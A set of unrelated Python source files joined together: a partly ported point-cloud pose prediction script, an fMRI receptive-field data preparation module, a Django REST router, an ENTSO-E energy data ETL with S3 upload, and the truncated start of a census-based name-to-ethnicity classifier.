gt_quat = tf.placeholder(dtype=tf.float32, shape=[1, 4])
pred_quat_n = quaternion_normalise(pred_quat)
gt_quat_n = quaternion_normalise(gt_quat)
un_q = quaternion_multiply(quaternion_conjugate(gt_quat_n), pred_quat_n)
pc_unrot = quaternion_rotate(input_pc, un_q)
return input_pc, pred_quat, gt_quat, pc_unrot
def normalise_depthmap(depth_map):
depth_map = np.clip(depth_map, 1.5, 2.5)
depth_map -= 1.5
return depth_map
def compute_predictions():
cfg = app_config
setup_environment(cfg)
exp_dir = cfg.checkpoint_dir
cfg.batch_size = 1
cfg.step_size = 1
pc_num_points = cfg.pc_num_points
vox_size = cfg.vox_size
save_pred = cfg.save_predictions
save_voxels = cfg.save_voxels
fast_conversion = True
pose_student = cfg.pose_predictor_student and cfg.predict_pose
device = 'cuda' if torch.cuda.is_available() else 'cpu'
model = model_pc.ModelPointCloud(cfg)
model = model.to(device)
log_dir = '../../dpc/run/model_run_data/'
learning_rate = 1e-4
optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate, weight_decay = cfg.weight_decay)
global_step = 100000
if global_step>0:
checkpoint_path = os.path.join(log_dir,'model.ckpt_{}.pth'.format(global_step))
print("Loading from path:",checkpoint_path)
checkpoint = torch.load(checkpoint_path)
global_step_val = checkpoint['global_step']
model.load_state_dict(checkpoint['model_state_dict'])
optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
loss = checkpoint['loss']
else:
global_step_val = global_step
print('Restored checkpoint at {} with loss {}'.format(global_step, loss))
save_dir = os.path.join(exp_dir, '{}_vis_proj'.format(cfg.save_predictions_dir))
mkdir_if_missing(save_dir)
save_pred_dir = os.path.join(exp_dir, cfg.save_predictions_dir)
mkdir_if_missing(save_pred_dir)
vis_size = cfg.vis_size
split_name = "val"
dataset_folder = cfg.inp_dir
dataset = ShapeRecords(dataset_folder, cfg, split_name)
dataset_loader = torch.utils.data.DataLoader(dataset,
batch_size=cfg.batch_size, shuffle=cfg.shuffle_dataset,
num_workers=4,drop_last=True)
pose_num_candidates = cfg.pose_predict_num_candidates
num_views = cfg.num_views
plot_h = 4
plot_w = 6
num_views = int(min(num_views, plot_h * plot_w / 2))
if cfg.models_list:
model_names = parse_lines(cfg.models_list)
else:
model_names = dataset.file_names
num_models = len(model_names)
for k in range(num_models):
model_name = model_names[k]
sample = dataset.__getitem__(k)
images = sample['image']
masks = sample['mask']
if cfg.saved_camera:
cameras = sample['extrinsic']
cam_pos = sample['cam_pos']
if cfg.vis_depth_projs:
depths = sample['depth']
if cfg.variable_num_views:
num_views = sample['num_views']
print("{}/{} {}".format(k, num_models, model_name))
if pose_num_candidates == 1:
grid = np.empty((plot_h, plot_w), dtype=object)
else:
plot_w = pose_num_candidates + 1
if pose_student:
plot_w += 1
grid = np.empty((num_views, plot_w), dtype=object)
if save_pred:
all_pcs = np.zeros((num_views, pc_num_points, 3))
all_cameras = np.zeros((num_views, 4))
#all_voxels = np.zeros((num_views, vox_size, vox_size, vox_size))
#all_z_latent = np.zeros((num_views, cfg.fc_dim))
for view_idx in range(num_views):
input_image_np = images[[view_idx], :, :, :]
gt_mask_np = masks[[view_idx], :, :, :]
if cfg.saved_camera:
extr_mtr = cameras[view_idx, :, :]
cam_quaternion_np = quaternion_from_campos(cam_pos[view_idx, :])
cam_quaternion_np = np.expand_dims(cam_quaternion_np, axis=0)
else:
extr_mtr = np.zeros((4, 4))
code = 'images' if cfg.predict_pose else 'images_1'
input = {code: input_image_np,
'matrices': extr_mtr,
'camera_quaternion': cam_quaternion_np}
out = build_model(model, input, global_step)
input_image = out["inputs"]
cam_matrix = out["camera_extr_src"]
cam_quaternion = out["cam_quaternion"]
point_cloud = out["points_1"]
#gb = out["rgb_1"] if cfg.pc_rgb else None
#rojs = out["projs"]
#rojs_rgb = out["projs_rgb"]
#rojs_depth = out["projs_depth"]
cam_transform = out["cam_transform"]
#_latent = out["z_latent"]
#if cfg.pc_rgb:
# proj_tensor = projs_rgb
#elif cfg.vis_depth_projs:
# proj_tensor = projs_depth
#else:
# proj_tensor = projs
if pose_student:
camera_student_np = out["pose_student"]
predicted_camera = camera_student_np
else:
predicted_camera = cam_transf_np
#if cfg.vis_depth_projs:
# proj_np = normalise_depthmap(out["projs"])
# if depths is not None:
# depth_np = depths[view_idx, :, :, :]
# depth_np = normalise_depthmap(depth_np)
# else:
# depth_np = 1.0 - np.squeeze(gt_mask_np)
# if pose_student:
# proj_student_np = normalise_depthmap(proj_student_np)
#if save_voxels:
# if fast_conversion:
# voxels, _ = pointcloud2voxels3d_fast(cfg, input_pc, None)
# voxels = tf.expand_dims(voxels, axis=-1)
# voxels = smoothen_voxels3d(cfg, voxels, model.gauss_kernel())
# else:
# voxels = pointcloud2voxels(cfg, input_pc, model.gauss_sigma())
if cfg.predict_pose:
if cfg.save_rotated_points:
ref_rot = scipy.io.loadmat("{}/final_reference_rotation.mat".format(exp_dir))
ref_rot = ref_rot["rotation"]
pc_unrot = quaternion_rotate(input_pc, ref_quat)
point_cloud = pc_np_unrot
if cfg.pc_rgb:
gt_image = input_image_np
elif cfg.vis_depth_projs:
gt_image = depth_np
else:
gt_image = gt_mask_np
# if pose_num_candidates == 1:
# view_j = view_idx * 2 // plot_w
# view_i = view_idx * 2 % plot_w
# gt_image = np.squeeze(gt_image)
# grid[view_j, view_i] = mask4vis(cfg, gt_image, vis_size)
# curr_img = np.squeeze(out[projs])
# grid[view_j, view_i + 1] = mask4vis(cfg, curr_img, vis_size)
# if cfg.save_individual_images:
# curr_dir = os.path.join(save_dir, model_names[k])
# if not os.path.exists(curr_dir):
# os.makedirs(curr_dir)
# imageio.imwrite(os.path.join(curr_dir, '{}_{}.png'.format(view_idx, 'rgb_gt')),
# mask4vis(cfg, np.squeeze(input_image_np), vis_size))
# imageio.imwrite(os.path.join(curr_dir, '{}_{}.png'.format(view_idx, 'mask_pred')),
# mask4vis(cfg, np.squeeze(proj_np), vis_size))
# else:
# view_j = view_idx
# gt_image = np.squeeze(gt_image)
# grid[view_j, 0] = mask4vis(cfg, gt_image, vis_size)
# for kk in range(pose_num_candidates):
# curr_img = np.squeeze(out["projs"][kk, :, :, :].detach().cpu())
# grid[view_j, kk + 1] = mask4vis(cfg, curr_img, vis_size)
# if cfg.save_individual_images:
# curr_dir = os.path.join(save_dir, model_names[k])
# if not os.path.exists(curr_dir):
# os.makedirs(curr_dir)
# imageio.imwrite(os.path.join(curr_dir, '{}_{}_{}.png'.format(view_idx, kk, 'mask_pred')),
# mask4vis(cfg, np.squeeze(curr_img), vis_size))
# if cfg.save_individual_images:
# imageio.imwrite(os.path.join(curr_dir, '{}_{}.png'.format(view_idx, 'mask_gt')),
# mask4vis(cfg, np.squeeze(gt_mask_np), vis_size))
# if pose_student:
# grid[view_j, -1] = mask4vis(cfg, np.squeeze(proj_student_np.detach().cpu()), vis_size)
if save_pred:
#pc_np = pc_np.detach().cpu().numpy()
all_pcs[view_idx, :, :] = np.squeeze(point_cloud.detach().cpu())
#all_z_latent[view_idx] = z_latent.detach().cpu()
if cfg.predict_pose:
all_cameras[view_idx, :] = predicted_camera.detach().cpu()
# if save_voxels:
# # multiplying by two is necessary because
# # pc->voxel conversion expects points in [-1, 1] range
# pc_np_range = pc_np
# if not fast_conversion:
# pc_np_range *= 2.0
# voxels_np = sess.run(voxels, feed_dict={input_pc: pc_np_range})
# all_voxels[view_idx, :, :, :] = np.squeeze(voxels_np)
# vis_view = view_idx == 0 or cfg.vis_all_views
# if cfg.vis_voxels and vis_view:
# rgb_np = np.squeeze(rgb_np) if cfg.pc_rgb else None
# vis_pc(np.squeeze(pc_np), rgb=rgb_np)
#grid_merged = merge_grid(cfg, grid)
#imageio.imwrite("{}/{}_proj.png".format(save_dir, sample.file_names), grid_merged)
if save_pred:
if 0:
save_dict = {"points": all_pcs}
if cfg.predict_pose:
save_dict["camera_pose"] = all_cameras
scipy.io.savemat("{}/{}_pc.mat".format(save_pred_dir, model_names[k]),
mdict=save_dict)
else:
save_dict = {"points": all_pcs}
if cfg.predict_pose:
save_dict["camera_pose"] = all_cameras
with open("{}/{}_pc.pkl".format(save_pred_dir, model_names[k]), 'wb') as handle:
pickle.dump(save_dict, handle, protocol=pickle.HIGHEST_PROTOCOL)
# if save_voxels:
# np.savez("{}/{}_vox".format(save_pred_dir,model_names[k]), all_voxels)
#def main(_):
def main():
compute_predictions()
if __name__ == '__main__':
#tf.app.run()
main()
|
import os
import numpy as np
import h5py
import nibabel as nb
from collections import defaultdict as dd
from pathlib import Path
import matplotlib.image as mpimg
from scipy.stats import zscore
opj = os.path.join
from prfpy.timecourse import filter_predictions
from prfpy.stimulus import PRFStimulus2D
def roi_mask(roi, array):
array_2 = np.zeros(array.shape).astype('bool')
array_2[roi] = True
masked_array = array * array_2
return masked_array
def inverse_roi_mask(roi, array):
array_2 = np.ones(array.shape).astype('bool')
array_2[roi] = False
masked_array = array * array_2
return masked_array
def create_dm_from_screenshots(screenshot_path,
n_pix=40,
dm_edges_clipping=[0,0,0,0]
):
image_list = os.listdir(screenshot_path)
# there is one more MR image than screenshot
design_matrix = np.zeros((n_pix, n_pix, 1+len(image_list)))
for image_file in image_list:
# assuming last three numbers before .png are the screenshot number
img_number = int(image_file[-7:-4])-1
# subtract one to start from zero
img = (255*mpimg.imread(os.path.join(screenshot_path, image_file))).astype('int')
# make it square
if img.shape[0] != img.shape[1]:
offset = int((img.shape[1]-img.shape[0])/2)
img = img[:, offset:(offset+img.shape[0])]
assert img.shape[0]%n_pix == 0, f"please choose a n_pix value that is a divisor of {str(img.shape[0])}"
# downsample
downsampling_constant = int(img.shape[0]/n_pix)
downsampled_img = img[::downsampling_constant, ::downsampling_constant]
# import matplotlib.pyplot as pl
# fig = pl.figure()
# pl.imshow(downsampled_img)
# fig.close()
# binarize image into dm matrix
# assumes: standard RGB255 format; only colors present in image are black, white, grey, red, green.
design_matrix[:, :, img_number][np.where(((downsampled_img[:, :, 0] == 0) & (
downsampled_img[:, :, 1] == 0)) | ((downsampled_img[:, :, 0] == 255) & (downsampled_img[:, :, 1] == 255)))] = 1
design_matrix[:, :, img_number][np.where(((downsampled_img[:, :, 0] == downsampled_img[:, :, 1]) & (
downsampled_img[:, :, 1] == downsampled_img[:, :, 2]) & (downsampled_img[:,:,0] != 127) ))] = 1
#clipping edges
#top, bottom, left, right
design_matrix[:dm_edges_clipping[0],:,:] = 0
design_matrix[(design_matrix.shape[0]-dm_edges_clipping[1]):,:,:] = 0
design_matrix[:,:dm_edges_clipping[2],:] = 0
design_matrix[:,(design_matrix.shape[0]-dm_edges_clipping[3]):,:] = 0
print("Design matrix completed")
return design_matrix
def create_full_stim(screenshot_paths,
n_pix,
discard_volumes,
baseline_volumes_begin_end,
dm_edges_clipping,
screen_size_cm,
screen_distance_cm,
TR,
task_names,
normalize_integral_dx):
dm_list = []
for i, task_name in enumerate(task_names):
# create stimulus
if task_name in screenshot_paths[i]:
#this is for hcp-format design matrix
if screenshot_paths[i].endswith('hdf5'):
with h5py.File(screenshot_paths[i], 'r') as f:
dm_task = np.array(f.get('stim')).T
dm_task /= dm_task.max()
#assert dm_task.shape[0]%n_pix == 0, f"please choose a n_pix value that is a divisor of {str(dm_task.shape[0])}"
if dm_task.shape[0]%n_pix != 0:
print(f"warning: n_pix is not a divisor of original DM size. The true downsampled size is: {dm_task[::int(dm_task.shape[0]/n_pix),0,0].shape[0]}")
dm_list.append(dm_task[::int(dm_task.shape[0]/n_pix),::int(dm_task.shape[0]/n_pix),:])
#this is for screenshots
else:
dm_list.append(create_dm_from_screenshots(screenshot_paths[i],
n_pix,
dm_edges_clipping)[..., discard_volumes:])
task_lengths = [dm.shape[-1] for dm in dm_list]
dm_full = np.concatenate(tuple(dm_list), axis=-1)
# late-empty DM periods (for calculation of BOLD baseline)
shifted_dm = np.zeros_like(dm_full)
# use timepoints where bar was gone from at least 7 TRs (this is a heuristic approximation)
shifted_dm[..., 7:] = dm_full[..., :-7]
late_iso_dict = {}
late_iso_dict['periods'] = np.where((np.sum(dm_full, axis=(0, 1)) == 0) & (
np.sum(shifted_dm, axis=(0, 1)) == 0))[0]
start=0
for i, task_name in enumerate(task_names):
stop=start+task_lengths[i]
if task_name not in screenshot_paths[i]:
print("WARNING: check that screenshot paths and task names are in the same order")
late_iso_dict[task_name] = late_iso_dict['periods'][np.where((late_iso_dict['periods']>=start) & (late_iso_dict['periods']<stop))]-start
start+=task_lengths[i]
prf_stim = PRFStimulus2D(screen_size_cm=screen_size_cm,
screen_distance_cm=screen_distance_cm,
design_matrix=dm_full,
TR=TR,
task_lengths=task_lengths,
task_names=task_names,
late_iso_dict=late_iso_dict,
normalize_integral_dx=normalize_integral_dx)
return prf_stim
def prepare_data(subj,
prf_stim,
test_prf_stim,
discard_volumes,
min_percent_var,
fix_bold_baseline,
filter_type,
filter_params,
data_path,
fitting_space,
data_scaling,
roi_idx,
save_raw_timecourse,
crossvalidate,
fit_runs,
fit_task,
save_noise_ceiling):
if fitting_space == 'fsaverage' or fitting_space == 'fsnative':
hemis = ['L', 'R']
elif fitting_space == 'HCP':
hemis = ['LR']
tc_dict = dd(lambda:dd(dict))
raw_tcs = False
for hemi in hemis:
for task_name in prf_stim.task_names:
tc_task = []
if fitting_space == 'fsaverage' or fitting_space == 'fsnative':
tc_paths = sorted(Path(opj(data_path,'fmriprep',subj)).glob(opj('**',subj+'_ses-*_task-'+task_name+'_run-*_space-'+fitting_space+'_hemi-'+hemi+'*.func.gii')))
elif fitting_space == 'HCP':
tc_paths = sorted(Path(opj(data_path,subj)).glob(opj('**',f"tfMRI_RET{task_name}*_7T_*_Atlas_1.6mm_MSMAll_hp2000_clean.dtseries.nii")))
print("For task "+task_name+", hemisphere "+hemi+" of subject "+subj+", a total of "+str(len(tc_paths))+" runs were found.")
if fit_runs is not None and (len(fit_runs)>len(tc_paths) or np.any(np.array(fit_runs)>=len(tc_paths))):
print(f"{fit_runs} fit_runs requested but only {len(tc_paths)} runs were found.")
raise ValueError
if fit_runs is None:
#if CV over tasks, or if no CV, use all runs
fit_runs = np.arange(len(tc_paths))
for tc_path in [tc_paths[run] for run in fit_runs]:
tc_run = nb.load(str(tc_path))
if fitting_space == 'fsaverage' or fitting_space == 'fsnative':
tc_run_data = np.array([arr.data for arr in tc_run.darrays]).T[...,discard_volumes:]
elif fitting_space == 'HCP':
#cortex only HCP data
tc_run_data = np.array(tc_run.get_data()).T[:118584,discard_volumes:]
#no need to pass further args, only filtering 1 condition
if data_scaling in ["zsc", "z-score"]:
tc_task.append(zscore(filter_predictions(tc_run_data,
filter_type=filter_type,
filter_params=filter_params), axis=0))
elif data_scaling in ["psc", "percent_signal_change"]:
tc_task.append(filter_predictions(tc_run_data,
filter_type=filter_type,
filter_params=filter_params))
tc_task[-1] *= (100/np.mean(tc_task[-1], axis=-1))[...,np.newaxis]
else:
print("Using raw data")
raw_tcs = True
tc_task.append(filter_predictions(tc_run_data,
filter_type=filter_type,
filter_params=filter_params))
#when scanning sub-001 i mistakenly set the length of the 4F scan to 147, while it should have been 145
#therefore, there are two extra images at the end to discard in that time series.
#from sub-002 onwards, this was corrected.
if subj == 'sub-001' and task_name=='4F':
tc_task[-1] = tc_task[-1][...,:-2]
tc_dict[hemi][task_name]['timecourse'] = np.mean(tc_task, axis=0)
tc_dict[hemi][task_name]['baseline'] = np.median(tc_dict[hemi][task_name]['timecourse'][...,prf_stim.late_iso_dict[task_name]],
axis=-1)
if crossvalidate:
for task_name in test_prf_stim.task_names:
tc_task = []
if fitting_space == 'fsaverage' or fitting_space == 'fsnative':
tc_paths = sorted(Path(opj(data_path,'fmriprep',subj)).glob(opj('**',subj+'_ses-*_task-'+task_name+'_run-*_space-'+fitting_space+'_hemi-'+hemi+'*.func.gii')))
elif fitting_space == 'HCP':
tc_paths = sorted(Path(opj(data_path,subj)).glob(opj('**',f"tfMRI_RET{task_name}*_7T_*_Atlas_1.6mm_MSMAll_hp2000_clean.dtseries.nii")))
print("For task "+task_name+", hemisphere "+hemi+" of subject "+subj+", a total of "+str(len(tc_paths))+" runs were found.")
if fit_task is not None:
#if CV is over tasks, can use all runs for test data as well
cv_runs = np.arange(len(tc_paths))
else:
cv_runs = [run for run in np.arange(len(tc_paths)) if run not in fit_runs]
for tc_path in [tc_paths[run] for run in cv_runs]:
tc_run = nb.load(str(tc_path))
#no need to pass further args, only filtering 1 condition
if fitting_space == 'fsaverage' or fitting_space == 'fsnative':
tc_run_data = np.array([arr.data for arr in tc_run.darrays]).T[...,discard_volumes:]
elif fitting_space == 'HCP':
#cortex only HCP data
tc_run_data = np.array(tc_run.get_data()).T[:118584,discard_volumes:]
if data_scaling in ["zsc", "z-score"]:
tc_task.append(zscore(filter_predictions(tc_run_data,
filter_type=filter_type,
filter_params=filter_params), axis=0))
elif data_scaling in ["psc", "percent_signal_change"]:
tc_task.append(filter_predictions(tc_run_data,
filter_type=filter_type,
filter_params=filter_params))
tc_task[-1] *= (100/np.mean(tc_task[-1], axis=-1))[...,np.newaxis]
else:
print("Using raw data")
raw_tcs = True
tc_task.append(filter_predictions(tc_run_data,
filter_type=filter_type,
filter_params=filter_params))
#when scanning sub-001 i mistakenly set the length of the 4F scan to 147, while it should have been 145
#therefore, there are two extra images at the end to discard in that time series.
#from sub-002 onwards, this was corrected.
if subj == 'sub-001' and task_name=='4F':
tc_task[-1] = tc_task[-1][...,:-2]
tc_dict[hemi][task_name]['timecourse_test'] = np.mean(tc_task, axis=0)
tc_dict[hemi][task_name]['baseline_test'] = np.median(tc_dict[hemi][task_name]['timecourse_test'][...,test_prf_stim.late_iso_dict[task_name]],
axis=-1)
#shift timeseries so they have the same average value in proper baseline periods across conditions
tc_dict[hemi]['median_baseline'] = np.median([tc_dict[hemi][task_name]['baseline'] for task_name in prf_stim.task_names], axis=0)
for task_name in prf_stim.task_names:
iso_diff = tc_dict[hemi]['median_baseline'] - tc_dict[hemi][task_name]['baseline']
tc_dict[hemi][task_name]['timecourse'] += iso_diff[...,np.newaxis]
tc_dict[hemi]['full_iso']=np.concatenate(tuple([tc_dict[hemi][task_name]['timecourse'] for task_name in prf_stim.task_names]), axis=-1)
if crossvalidate:
tc_dict[hemi]['median_baseline_test'] = np.median([tc_dict[hemi][task_name]['baseline_test'] for task_name in test_prf_stim.task_names], axis=0)
for task_name in test_prf_stim.task_names:
iso_diff_test = tc_dict[hemi]['median_baseline_test'] - tc_dict[hemi][task_name]['baseline_test']
tc_dict[hemi][task_name]['timecourse_test'] += iso_diff_test[...,np.newaxis]
tc_dict[hemi]['full_iso_test']=np.concatenate(tuple([tc_dict[hemi][task_name]['timecourse_test'] for task_name in test_prf_stim.task_names]), axis=-1)
tc_full_iso = np.concatenate(tuple([tc_dict[hemi]['full_iso'] for hemi in hemis]), axis=0)
iso_full = np.concatenate(tuple([tc_dict[hemi]['median_baseline'] for hemi in hemis]), axis=0)
tc_mean = tc_full_iso.mean(-1)
if crossvalidate:
tc_full_iso_test = np.concatenate(tuple([tc_dict[hemi]['full_iso_test'] for hemi in hemis]), axis=0)
iso_full_test = np.concatenate(tuple([tc_dict[hemi]['median_baseline_test'] for hemi in hemis]), axis=0)
tc_mean_test = tc_full_iso_test.mean(-1)
#masking flat or nearly flat timecourses
if crossvalidate:
nonlow_var = (np.abs(tc_full_iso - tc_mean[...,np.newaxis]).max(-1) > (tc_mean*min_percent_var/100)) \
* (np.abs(tc_full_iso_test - tc_mean_test[...,np.newaxis]).max(-1) > (tc_mean_test*min_percent_var/100)) #\
#* (tc_mean>0) * (tc_mean_test>0)
else:
nonlow_var = (np.abs(tc_full_iso - tc_mean[...,np.newaxis]).max(-1) > (tc_mean*min_percent_var/100)) #\
#* (tc_mean>0)
if roi_idx is not None:
mask = roi_mask(roi_idx, nonlow_var)
else:
mask = nonlow_var
tc_dict_combined = dict()
tc_dict_combined['mask'] = mask
tc_full_iso_nonzerovar = tc_full_iso[mask]
if crossvalidate:
tc_full_iso_nonzerovar_test = tc_full_iso_test[mask]
if fix_bold_baseline:
tc_full_iso_nonzerovar -= iso_full[mask][...,np.newaxis]
if crossvalidate:
tc_full_iso_nonzerovar_test -= iso_full_test[mask][...,np.newaxis]
if save_raw_timecourse and raw_tcs == True:
np.save(opj(data_path.replace('scratch-shared', 'home'),'prfpy',subj+"_timecourse-raw_space-"+fitting_space+".npy"),tc_full_iso[mask])
np.save(opj(data_path.replace('scratch-shared', 'home'),'prfpy',subj+"_mask-raw_space-"+fitting_space+".npy"),mask)
if crossvalidate:
np.save(opj(data_path.replace('scratch-shared', 'home'),'prfpy',subj+"_timecourse-test-raw_space-"+fitting_space+".npy"),tc_full_iso_test[mask])
if save_noise_ceiling:
noise_ceiling = 1-np.sum((tc_full_iso_nonzerovar_test-tc_full_iso_nonzerovar)**2, axis=-1)/(tc_full_iso_nonzerovar_test.shape[-1]*tc_full_iso_nonzerovar_test.var(-1))
np.save(opj(data_path,'prfpy',f"{subj}_noise-ceiling_space-{fitting_space}.npy"),noise_ceiling)
order = np.random.permutation(tc_full_iso_nonzerovar.shape[0])
tc_dict_combined['order'] = order
tc_dict_combined['tc'] = tc_full_iso_nonzerovar[order]
if crossvalidate:
tc_dict_combined['tc_test'] = tc_full_iso_nonzerovar_test[order]
return tc_dict_combined
|
from rest_framework.routers import DefaultRouter
from posts_areas.api_v1.views import PostAreaViewSet
# Create a router and register our viewsets with it.
# app_name = 'posts_areas'
router = DefaultRouter()
router.register(r'posts_areas', PostAreaViewSet, base_name="posts_areas-posts_areas")
urlpatterns = router.urls
|
import os
import pandas as pd
from pathlib import Path
import datetime
import logging
import boto3
def traverse_path(path, split_idx):
"""
Generates a dictionary of the path to each country.
Input:
path: str. The path to the root directory
split_idx: int. split point to capture country name. I.e. -2 splits one directory up.
"""
pathlist = Path(path).glob('**/*.csv')
country_paths = dict()
for p in pathlist:
path_in_str = str(p)
country = path_in_str.split('/')[split_idx]
if country not in country_paths.keys():
country_paths[country] = [path_in_str]
else:
country_paths[country].append(path_in_str)
return country_paths
def process_capacity_demand(country_paths, output_path, name, new_cols=None):
"""
Prepares capacity and demand csvs from the ENTOSE API for the data warehouse.
Appends country information and renames columns
country_paths: dict. country and path to csvs with installed capcity data
new_cols: list. list of new columns headers
"""
for country, path_in_strs in country_paths.items():
for path_in_str in path_in_strs:
# load dataframe
df = pd.read_csv(path_in_str)
# add country name
df['country_id'] = country
# rename columns
if new_cols is not None:
if 'Unnamed: 0' in df.columns:
df.drop('Unnamed: 0', axis=1, inplace=True)
assert len(new_cols) == len(df.columns), f'new_cols must be length {len(df.columns)}'
df.columns = new_cols
#gross quick solution. refactor total_demand into own function.
if 'event_date' in df.columns:
df['event_date'] = df['event_date'].str.replace("-", "") \
.str.replace(":", "") \
.apply(lambda x: x.split("+")[0])
# save dataframe
# this datetime year reference also must be refactored.
df.to_csv(os.path.join(output_path, f'{name}-{country}-{datetime.datetime.now().year}.csv'),
index=False, header=False)
print(f'Saved: {country}')
def process_total_demand(country_paths, output_path):
"""
Prepares the total demand csvs from the ENTOSE database for the data warehouse.
Input:
country_paths: dict. dict. country and path to csvs with total generation data
output_path: str. path to save
"""
for country, path_in_strs in country_paths.items():
for path_in_str in path_in_strs:
# load dataframe
df = pd.read_csv(path_in_str)
# add country name
df['country_id'] = country
## clean column headers
df.columns = [x[0].strip().lower() for x in df.columns.str.split(" ")]
df = df.drop('day-ahead', axis=1)
df.rename(columns={'actual': 'total_demand'}, inplace=True)
df['event_date'] = df['time'].apply(lambda x: pd.to_datetime(x.split("-")[0]))
df = df.drop('time', axis=1)
df = df.set_index('event_date')
df.index = df.index.tz_localize(tz='Europe/Brussels',
ambiguous='infer',
nonexistent='shift_backward')
df['ts'] = df.index.asi8
df.index = df.index.strftime("%Y%m%d %H%M%S")
df.fillna(0, inplace=True)
# get date ranges
start = df.index[0].split(" ")[0]
end = df.index[-1].split(" ")[0]
# save dataframe
df = df.reset_index()
# save dataframe
df.to_csv(os.path.join(output_path, f'demand-{country}-{start}-{end}.csv'),
index=False, header=False)
print(f'Saved: {country}')
def process_total_generation(country_paths, output_path):
"""
Prepares the total generation csvs from the ENTOSE database for the data warehouse.
Input:
country_paths: dict. dict. country and path to csvs with total generation data
output_path: str. path to save
"""
for country, path_in_strs in country_paths.items():
for path_in_str in path_in_strs:
# load dataframe
df = pd.read_csv(path_in_str)
# add country name
df['country_id'] = country
## clean column headers
df.columns = [x[0].strip().lower() for x in df.columns.str.split("-")]
## parse datetime and set index as dt object
df['event_date'] = df['mtu'].apply(lambda x: pd.to_datetime(x.split("-")[0]))
df = df.drop('mtu', axis=1)
df = df.set_index('event_date')
df.index = df.index.tz_localize(tz='Europe/Brussels',
ambiguous='infer',
nonexistent='shift_backward')
## Add a timestamp column
df['ts'] = df.index.asi8
## format index times for aws YYYY-MM-DD HH:MM:SS
df.index = df.index.strftime("%Y%m%d %H%M%S")
# get date ranges
start = df.index[0].split(" ")[0]
end = df.index[-1].split(" ")[0]
## unpivot data into long format
df = df.reset_index().melt(id_vars=['event_date', 'ts', 'country_id', 'area'],
var_name='generation_type',
value_name='generation_load')
## fill mising values
df['generation_load'] = df['generation_load'].replace('n/e', 0).astype('float')
df['generation_load'].fillna(0, inplace=True)
# save dataframe
df.to_csv(os.path.join(output_path, f'generation-{country}-{start}-{end}.csv'),
index=False, header=False)
print(f'Saved: {country}')
def process_day_ahead_prices(country_paths, output_path):
"""
Prepares the day ahead prices csvs from the ENTOSE database for the data warehouse.
Input:
country_paths: dict. dict. country and path to csvs with total generation data
output_path: str. path to save
"""
for country, path_in_strs in country_paths.items():
for path_in_str in path_in_strs:
# load dataframe
df = pd.read_csv(path_in_str)
# add country name
df['country_id'] = country
## clean column headers
df.columns = [x[0].strip().lower() for x in df.columns.str.split(" ")]
df.rename(columns={'day-ahead': 'day_ahead_price'}, inplace=True)
if df['day_ahead_price'].dtype == 'O':
df['day_ahead_price'] = df['day_ahead_price'].apply(lambda x: str(x).split(" ")[0]).astype('float')
## parse datetime and set index as dt object
df['event_date'] = df['mtu'].apply(lambda x: pd.to_datetime(x.split("-")[0]))
df = df.drop('mtu', axis=1)
df = df.set_index('event_date')
df.index = df.index.tz_localize(tz='Europe/Brussels',
ambiguous='infer',
nonexistent='shift_backward')
## Add a timestamp column to keep timezone information
df['ts'] = df.index.asi8
## format index times for aws YYYY-MM-DD HH:MM:SS
df.index = df.index.strftime("%Y%m%d %H%M%S")
## fill missing values
df.fillna(0, inplace=True)
# get date ranges
start = df.index[0].split(" ")[0]
end = df.index[-1].split(" ")[0]
# save dataframe
df = df.reset_index()
df.to_csv(os.path.join(output_path, f'day-ahead-prices-{country}-{start}-{end}.csv'),
index=False, header=False)
print(f'Saved: {country}')
def upload_data(path, bucketname):
client = boto3.client(
's3',
aws_access_key_id=os.environ['AWS_USER'],
aws_secret_access_key=os.environ['AWS_KEY'])
s3c = boto3.client('s3')
s3 = boto3.resource('s3')
for root, dirs, files in os.walk(path):
head = ('/').join(root.split('/')[-1:])
objs = list(s3.Bucket(bucketname).objects.filter(Prefix=head))
# skip enmpty head path
if len(head) == 0:
continue
if len(objs) > 0:
aws_head = ('/').join(objs[0].key.split('/')[:2])
if aws_head != head:
s3c.put_object(Bucket=bucketname, Key=(head + '/'))
print(f'New directory: {head}')
elif len(objs) == 0:
s3c.put_object(Bucket=bucketname, Key=(head + '/'))
print(f'New directory: {head}')
for file in files:
if file != '.DS_Store':
print(f'{head}/{file}')
s3c.upload_file(os.path.join(root, file), bucketname, f'{head}/{file}')
def process_data():
root_path = './data/raw'
output_path = './data/processed/{}'
processed_path = './data/processed'
bucket = 'energy-etl-processed'
print('Preprocessing total demand')
logging.info('Preprocessing total demand')
country_paths = traverse_path(os.path.join(root_path, 'total_demand'), -2)
new_total_demand_cols = ['event_date', 'total_demand', 'ts', 'country_id']
process_capacity_demand(country_paths,
output_path.format('total_demand'),
'demand',
new_total_demand_cols)
logging.info('Processing OK: Total demand')
print('Preprocessing installed capacity')
logging.info('Preprocessing installed capacity')
country_paths = traverse_path(os.path.join(root_path, 'installed_capacity'), -2)
new_install_capacity_cols = ['event_date', 'production_type', 'code',
'name', 'installed_capacity_year_start',
'current_installed_capacity', 'location',
'voltage_connection_level', 'commissioning_date',
'decommissioning_date', 'country_id']
process_capacity_demand(country_paths,
output_path.format('installed_capacity'),
'capacity',
new_install_capacity_cols)
logging.info('Processing OK: Installed Capacity')
print('Preprocessing total generation')
logging.info('Preprocessing total generation')
country_paths = traverse_path(os.path.join(root_path, 'total_generation'), -2)
process_total_generation(country_paths, output_path.format('total_generation'))
logging.info('Processing OK: Total Generation')
print('Preprocessing day ahead prices')
logging.info('Preprocessing day ahead prices')
country_paths = traverse_path(os.path.join(root_path, 'day_ahead_prices'), -2)
process_day_ahead_prices(country_paths, output_path.format('day_ahead_prices'))
logging.info('Processing OK: Day Ahead Prices')
print(f'Uploading to S3 bucket {bucket}')
logging.info(f'Uploading to S3 bucket {bucket}')
upload_data(processed_path, bucket)
if __name__ == '__main__':
process_data()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Train a model to classify ethnicity based on census data
Created on Thu Apr 13 16:31:53 2017
@author: dhingratul
"""
import numpy as np
my_data = np.genfromtxt('census_2000.csv', delimiter=",", dtype=str)
eth = [0, 1, 2, 3, 4, 5]
k = 3
dic = {}
np.delete(my_data, 0, 0) # Remove Headers
# Random data split into Train and Test
np.random.shuffle(my_data)
split = round(0.9*len(my_data))
train = my_data[:split, :]
test = my_data[split:, :]
# print(my_data)
names = train[:, 0]
for i in range(len(names)):
# print(names[i])
for j in range(len(names[i])-k+1):
# print(j)
try:
ctr = int(train[i, 2])
if names[i][j:j+k] not in dic:
